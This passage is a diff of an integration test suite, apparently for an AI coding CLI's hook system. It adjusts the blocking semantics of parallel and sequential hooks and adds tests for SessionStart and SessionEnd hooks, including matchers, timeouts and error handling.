@@ -1148,7 +1092,6 
@@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1177,7 +1120,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1204,7 +1146,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1236,7 +1177,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1277,7 +1217,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1332,7 +1271,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1387,7 +1325,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1448,7 +1385,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1487,7 +1423,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1505,60 +1440,20 @@ describe('Hooks System Integration', () => { .filter((line) => line.trim() === 'hook_called').length; expect(hookInvokeCount).toBeGreaterThan(1); }); - - it('should handle stop hook with error alongside blocking hook', async () => { - const blockScript = 'echo {"decision": "block", "reason": "Blocked"}'; - - await rig.setup('stop-error-with-block', { - settings: { - hooksConfig: { enabled: true }, - hooks: { - Stop: [ - { - hooks: [ - { - type: 'command', - command: '/nonexistent/command', - name: 'stop-error-hook', - timeout: 5000, - }, - { - type: 'command', - command: blockScript, - name: 'stop-block-hook', - timeout: 5000, - }, - ], - }, - ], - }, - trusted: true, - }, - }); - - // When Stop hook blocks, agent continues execution normally (with max turns to prevent infinite loop) - const result = await rig.run( - 'Say error with block', - '--max-session-turns', - '2', - ); - expect(result).toBeDefined(); - expect(result.length).toBeGreaterThan(0); - }); }); }); // ========================================================================== - // Multiple Hooks (General) + // 
Multiple Hooks // Tests for hook execution modes: sequential vs parallel // ========================================================================== describe('Multiple Hooks', () => { describe('Sequential Execution', () => { it('should execute hooks sequentially when sequential: true', async () => { const hook1Script = - 'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "first"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "first"}}\''; const hook2Script = - 'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "second"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "second"}}\''; await rig.setup('multi-sequential', { settings: { @@ -1584,7 +1479,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1594,8 +1488,8 @@ describe('Hooks System Integration', () => { it('should stop at first blocking hook and not execute subsequent', async () => { const blockScript = - 'echo {"decision": "block", "reason": "Blocked by first hook"}'; - const allowScript = 'echo {"decision": "allow"}'; + 'echo \'{"decision": "block", "reason": "Blocked by first hook"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-first-blocks', { settings: { @@ -1621,22 +1515,20 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); - // Note: Sequential hooks with block decision currently don't block as expected - // This is a known limitation - the hook config may not be correctly applied for sequential hooks - const result = await rig.run('Create a file'); - expect(result).toBeDefined(); - expect(result.length).toBeGreaterThan(0); + // When the first hook blocks, the UserPromptSubmit should be blocked + await expect(rig.run('Create a file')).rejects.toThrow( + /blocked|Blocked by first hook/i, + ); }); it('should pass output from first hook to second hook input', async () => { const passScript1 = - 
'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "from first", "passthrough": "data"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "from first", "passthrough": "data"}}\''; const passScript2 = - 'echo {"decision": "allow", "hookSpecificOutput": {"additionalContext": "received passthrough"}}'; + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "received passthrough"}}\''; await rig.setup('multi-passthrough', { settings: { @@ -1662,7 +1554,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1673,8 +1564,8 @@ describe('Hooks System Integration', () => { describe('Parallel Execution', () => { it('should execute hooks in parallel when sequential is not set', async () => { - const hook1Script = 'echo {"decision": "allow"}'; - const hook2Script = 'echo {"decision": "allow"}'; + const hook1Script = 'echo \'{"decision": "allow"}\''; + const hook2Script = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-parallel', { settings: { @@ -1699,7 +1590,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1710,7 +1600,7 @@ describe('Hooks System Integration', () => { it('should handle mixed success/failure results from parallel hooks', async () => { // For UserPromptSubmit hooks, command execution failure is treated as a blocking error // So when one hook fails, the entire operation is blocked - const allowScript = 'echo {"decision": "allow"}'; + const allowScript = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-mixed', { settings: { @@ -1735,7 +1625,6 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); @@ -1746,8 +1635,9 @@ describe('Hooks System Integration', () => { }); it('should allow when any hook returns allow in parallel (OR logic)', async () => { - const blockScript = 'echo {"decision": "block", "reason": "blocked"}'; - const allowScript = 'echo {"decision": "allow"}'; + const 
blockScript = + 'echo \'{"decision": "block", "reason": "blocked"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; await rig.setup('multi-or-logic', { settings: { @@ -1772,12 +1662,1590 @@ describe('Hooks System Integration', () => { }, ], }, - trusted: true, }, }); - const result = await rig.run('Say or logic'); - // With OR logic, allow should win + // With security-sensitive OR logic, block should win (most restrictive decision wins) + await expect(rig.run('Say or logic')).rejects.toThrow(/blocked|error/i); + }); + }); + }); + + // ========================================================================== + // SessionStart Hooks + // Tests for session start lifecycle hooks with rich matcher and aggregator scenarios + // ========================================================================== + describe('SessionStart Hooks', () => { + describe('Single SessionStart Hook', () => { + it('should execute SessionStart hook on session startup', async () => { + const sessionStartScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Session started successfully"}}\''; + + await rig.setup('session-start-basic', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: sessionStartScript, + name: 'session-start-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should inject additional context from SessionStart hook', async () => { + const contextScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Project context: TypeScript React app with strict linting rules"}}\''; + + await rig.setup('session-start-context', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'session-start-context-hook', + timeout: 5000, + }, + ], + 
}, + ], + }, + }, + }); + + const result = await rig.run('What project context do you have?'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('typescript'); + }); + + it('should handle SessionStart hook with system message', async () => { + const systemMsgScript = + 'echo \'{"decision": "allow", "systemMessage": "Welcome! Session initialized with custom settings"}\''; + + await rig.setup('session-start-system-msg', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: systemMsgScript, + name: 'session-start-system-msg-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionStart Matcher Scenarios', () => { + it('should match startup source with matcher', async () => { + const startupScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Startup hook executed"}}\''; + const otherScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Other hook executed"}}\''; + + await rig.setup('session-start-matcher-startup', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup', + hooks: [ + { + type: 'command', + command: startupScript, + name: 'session-start-startup-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'resume', + hooks: [ + { + type: 'command', + command: otherScript, + name: 'session-start-resume-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say startup test'); + expect(result).toBeDefined(); + }); + + it('should match multiple sources with regex matcher', async () => { + const multiSourceScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Multi-source hook executed"}}\''; + + await rig.setup('session-start-matcher-regex', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + 
matcher: 'startup|resume', + hooks: [ + { + type: 'command', + command: multiSourceScript, + name: 'session-start-multi-source-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say regex matcher test'); + expect(result).toBeDefined(); + }); + + it('should match all sources with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard hook executed"}}\''; + + await rig.setup('session-start-matcher-wildcard', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'session-start-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + expect(result).toBeDefined(); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Should not execute"}}\''; + + await rig.setup('session-start-matcher-no-match', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'clear', // This won't match startup + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'session-start-clear-only-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say no match test'); + expect(result).toBeDefined(); + }); + + it('should match clear source with matcher', async () => { + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear hook executed"}}\''; + + await rig.setup('session-start-matcher-clear', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-start-clear-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say clear 
test'); + expect(result).toBeDefined(); + }); + + it('should match compact source with matcher', async () => { + const compactScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Compact hook executed"}}\''; + + await rig.setup('session-start-matcher-compact', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'compact', + hooks: [ + { + type: 'command', + command: compactScript, + name: 'session-start-compact-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say compact test'); + expect(result).toBeDefined(); + }); + + it('should match all four sources with regex matcher', async () => { + const allSourcesScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "All sources hook executed"}}\''; + + await rig.setup('session-start-matcher-all-sources', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup|resume|clear|compact', + hooks: [ + { + type: 'command', + command: allSourcesScript, + name: 'session-start-all-sources-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all sources test'); + expect(result).toBeDefined(); + }); + + it('should match startup and resume but not clear or compact', async () => { + const startupResumeScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Startup/Resume hook executed"}}\''; + const clearCompactScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear/Compact hook executed"}}\''; + + await rig.setup('session-start-matcher-partial', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup|resume', + hooks: [ + { + type: 'command', + command: startupResumeScript, + name: 'session-start-startup-resume-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'clear|compact', + hooks: [ + { + type: 'command', + command: 
clearCompactScript, + name: 'session-start-clear-compact-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say partial matcher test'); + expect(result).toBeDefined(); + }); + + it('should handle invalid regex in matcher gracefully', async () => { + const invalidRegexScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Fallback to exact match"}}\''; + + await rig.setup('session-start-matcher-invalid-regex', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: '[invalid-regex', // Invalid regex pattern + hooks: [ + { + type: 'command', + command: invalidRegexScript, + name: 'session-start-invalid-regex-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say invalid regex test'); + expect(result).toBeDefined(); + }); + + it('should match all session start sources with individual hooks', async () => { + const startupScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Startup triggered"}}\''; + const resumeScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Resume triggered"}}\''; + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear triggered"}}\''; + const compactScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Compact triggered"}}\''; + + await rig.setup('session-start-all-sources-individual', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + matcher: 'startup', + hooks: [ + { + type: 'command', + command: startupScript, + name: 'session-start-startup-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'resume', + hooks: [ + { + type: 'command', + command: resumeScript, + name: 'session-start-resume-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-start-clear-hook', 
+ timeout: 5000, + }, + ], + }, + { + matcher: 'compact', + hooks: [ + { + type: 'command', + command: compactScript, + name: 'session-start-compact-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all sources individual test'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SessionStart Hooks', () => { + it('should execute multiple parallel SessionStart hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel hook 2"}}\''; + const script3 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel hook 3"}}\''; + + await rig.setup('session-start-multi-parallel', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'session-start-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-start-parallel-2', + timeout: 5000, + }, + { + type: 'command', + command: script3, + name: 'session-start-parallel-3', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi parallel'); + expect(result).toBeDefined(); + }); + + it('should execute sequential SessionStart hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential hook 2"}}\''; + + await rig.setup('session-start-multi-sequential', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'session-start-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-start-seq-2', + 
timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential'); + expect(result).toBeDefined(); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from hook 2"}}\''; + + await rig.setup('session-start-multi-context', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'session-start-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'session-start-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('What context do you have?'); + expect(result).toBeDefined(); + }); + + it('should handle system messages from multiple hooks', async () => { + const msg1 = + 'echo \'{"decision": "allow", "systemMessage": "System message 1"}\''; + const msg2 = + 'echo \'{"decision": "allow", "systemMessage": "System message 2"}\''; + + await rig.setup('session-start-multi-system-msg', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: msg1, + name: 'session-start-sys-1', + timeout: 5000, + }, + { + type: 'command', + command: msg2, + name: 'session-start-sys-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionStart Error Handling', () => { + it('should continue session when hook exits with non-blocking error', async () => { + await rig.setup('session-start-nonblocking-error', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'session-start-error-hook', + timeout: 5000, + }, + 
], + }, + ], + }, + }, + }); + + const result = await rig.run('Say error test'); + expect(result).toBeDefined(); + }); + + it('should continue session when hook command does not exist', async () => { + await rig.setup('session-start-missing-command', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/session/start/command', + name: 'session-start-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say missing test'); + expect(result).toBeDefined(); + }); + + it('should handle hook timeout gracefully', async () => { + await rig.setup('session-start-timeout', { + settings: { + hooks: { + enabled: true, + SessionStart: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 60', + name: 'session-start-timeout-hook', + timeout: 1000, // 1 second timeout + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say timeout test'); + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // SessionEnd Hooks + // Tests for session end lifecycle hooks with various exit reasons + // ========================================================================== + describe('SessionEnd Hooks', () => { + describe('Single SessionEnd Hook', () => { + it('should execute SessionEnd hook on session end', async () => { + const sessionEndScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('session-end-basic', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: sessionEndScript, + name: 'session-end-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + }); + + it('should execute SessionEnd hook with cleanup tasks', async () => { + const cleanupScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": 
"Cleanup completed"}}\''; + + await rig.setup('session-end-cleanup', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: cleanupScript, + name: 'session-end-cleanup-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say cleanup test'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionEnd Matcher Scenarios', () => { + it('should match specific exit reason with matcher', async () => { + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear hook executed"}}\''; + const logoutScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Logout hook executed"}}\''; + + await rig.setup('session-end-matcher-clear', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-end-clear-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'logout', + hooks: [ + { + type: 'command', + command: logoutScript, + name: 'session-end-logout-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say matcher test'); + expect(result).toBeDefined(); + }); + + it('should match multiple exit reasons with regex matcher', async () => { + const multiReasonScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Multi-reason hook executed"}}\''; + + await rig.setup('session-end-matcher-regex', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: 'clear|logout|other', + hooks: [ + { + type: 'command', + command: multiReasonScript, + name: 'session-end-multi-reason-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say regex matcher test'); + expect(result).toBeDefined(); + }); + + it('should match all reasons with wildcard matcher', async () => { + const wildcardScript = + 'echo 
\'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Wildcard end hook executed"}}\''; + + await rig.setup('session-end-matcher-wildcard', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'session-end-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + expect(result).toBeDefined(); + }); + + it('should handle invalid regex in SessionEnd matcher gracefully', async () => { + const invalidRegexScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "SessionEnd fallback to exact match"}}\''; + + await rig.setup('session-end-matcher-invalid-regex', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + matcher: '[invalid-regex', // Invalid regex pattern + hooks: [ + { + type: 'command', + command: invalidRegexScript, + name: 'session-end-invalid-regex-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say invalid regex SessionEnd test'); + expect(result).toBeDefined(); + }); + + it('should match all SessionEnd reasons with individual hooks', async () => { + const clearScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Clear reason triggered"}}\''; + const logoutScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Logout reason triggered"}}\''; + const promptExitScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "PromptInputExit reason triggered"}}\''; + const bypassDisabledScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Bypass permissions disabled triggered"}}\''; + const otherScript = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Other reason triggered"}}\''; + + await rig.setup('session-end-all-reasons-individual', { + settings: { + 
hooks: { + enabled: true, + SessionEnd: [ + { + matcher: 'clear', + hooks: [ + { + type: 'command', + command: clearScript, + name: 'session-end-clear-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'logout', + hooks: [ + { + type: 'command', + command: logoutScript, + name: 'session-end-logout-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'promptInputExit', + hooks: [ + { + type: 'command', + command: promptExitScript, + name: 'session-end-prompt-exit-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'bypass_permissions_disabled', + hooks: [ + { + type: 'command', + command: bypassDisabledScript, + name: 'session-end-bypass-disabled-hook', + timeout: 5000, + }, + ], + }, + { + matcher: 'other', + hooks: [ + { + type: 'command', + command: otherScript, + name: 'session-end-other-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all SessionEnd reasons test'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SessionEnd Hooks', () => { + it('should execute multiple parallel SessionEnd hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End hook 2"}}\''; + + await rig.setup('session-end-multi-parallel', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'session-end-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-end-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi parallel end'); + expect(result).toBeDefined(); + }); + + it('should execute sequential SessionEnd hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential end hook 1"}}\''; + const script2 = 
+ 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential end hook 2"}}\''; + + await rig.setup('session-end-multi-sequential', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'session-end-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'session-end-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential end'); + expect(result).toBeDefined(); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End context from hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "End context from hook 2"}}\''; + + await rig.setup('session-end-multi-context', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'session-end-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'session-end-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say end context test'); + expect(result).toBeDefined(); + }); + }); + + describe('SessionEnd Block Scenarios', () => { + it('should block session end when hook returns block decision', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Session end blocked by policy"}\''; + + await rig.setup('session-end-block', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say block test'); + expect(result).toBeDefined(); + // Session should not end, agent continues + 
expect(result.toLowerCase()).toContain('block'); + }); + + it('should allow session end when hook returns allow decision', async () => { + const allowScript = + 'echo \'{"decision": "allow", "reason": "Session end allowed"}\''; + + await rig.setup('session-end-allow', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'session-end-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say allow test'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block when one of multiple parallel hooks returns block', async () => { + const allowScript = + 'echo \'{"decision": "allow", "reason": "Allowed"}\''; + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked by security policy"}\''; + + await rig.setup('session-end-multi-one-blocks', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'session-end-allow-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi block test'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('block'); + }); + + it('should block when first sequential hook returns block', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "First hook blocks session end"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('session-end-seq-first-blocks', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: blockScript, + name: 'session-end-seq-block-hook', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'session-end-seq-allow-hook', + timeout: 5000, + }, + ], + }, + ], + 
}, + }, + }); + + const result = await rig.run('Say seq block test'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('block'); + }); + + it('should allow when all hooks return allow', async () => { + const allow1Script = + 'echo \'{"decision": "allow", "reason": "First allows"}\''; + const allow2Script = + 'echo \'{"decision": "allow", "reason": "Second allows"}\''; + + await rig.setup('session-end-all-allow', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allow1Script, + name: 'session-end-allow-1', + timeout: 5000, + }, + { + type: 'command', + command: allow2Script, + name: 'session-end-allow-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say all allow test'); + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should handle block with reason in session end', async () => { + const blockWithReasonScript = + 'echo \'{"decision": "block", "reason": "Critical operations pending - cannot end session"} \''; + + await rig.setup('session-end-block-with-reason', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: blockWithReasonScript, + name: 'session-end-block-reason-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say block with reason'); + expect(result).toBeDefined(); + expect(result.toLowerCase()).toContain('block'); + }); + }); + + describe('SessionEnd Error Handling', () => { + it('should continue session end when hook exits with non-blocking error', async () => { + await rig.setup('session-end-nonblocking-error', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'session-end-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say error test'); + 
expect(result).toBeDefined(); + }); + + it('should continue session end when hook command does not exist', async () => { + await rig.setup('session-end-missing-command', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/session/end/command', + name: 'session-end-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say missing test'); + expect(result).toBeDefined(); + }); + }); + + describe('Multiple SessionEnd Hooks', () => { + it('should block when one of multiple parallel hooks returns block', async () => { + const allowScript = 'echo \'{"decision": "allow"}\''; + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + + await rig.setup('session-end-multi-one-blocks', { + settings: { + hooks: { + enabled: true, + SessionEnd: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'session-end-allow-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'session-end-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello'); + expect(result).toBeDefined(); + // SessionEnd hooks run after the main command completes and don't affect the main output + expect(result.toLowerCase()).not.toContain('block'); + }); + + it('should block when first sequential hook returns block', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('session-end-seq-first-blocks', { + settings: { + hooks: { + 